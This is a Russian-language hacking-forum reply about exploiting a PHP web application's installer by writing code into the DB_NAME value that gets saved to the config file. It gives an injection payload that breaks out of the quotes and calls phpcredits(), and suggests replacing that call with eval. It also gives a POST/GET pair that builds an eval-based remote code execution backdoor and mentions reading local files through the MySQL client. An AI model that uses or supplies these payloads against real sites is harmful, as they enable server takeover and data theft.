25.09.2017, 15:41
|
|
Постоянный
Регистрация: 17.03.2014
Сообщений: 530
Провел на форуме:
187765
Репутация:
154
|
|
Сообщение от crlf
↑
Если конфиг точно пишется в файл, то можно попробовать записать
DB_NAME
так:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]'.phpcredits(),//
[/COLOR][/COLOR]
Если при обращении к конфигу выведется
phpcredits
, то можно заменить его на
eval
. Но скорее всего кавычка будет эскейпиться.
Может писать все креды. Поэтому есть смысл пробовать вариант инсталла на удалённый сервер. И чтение локальных файлов на мускул клиенте, если пых старенький.
Не мне тебя учить, что можно и без кавычки обойтись. Поэтому просто дополню:
Вариантов куча, один из.
Например постом отправляем
Код:
cmd=print(eval(current($_GET)));print(____);die;
А в гет
Код:
/index.php?anyname=phpcredits();
|
|
|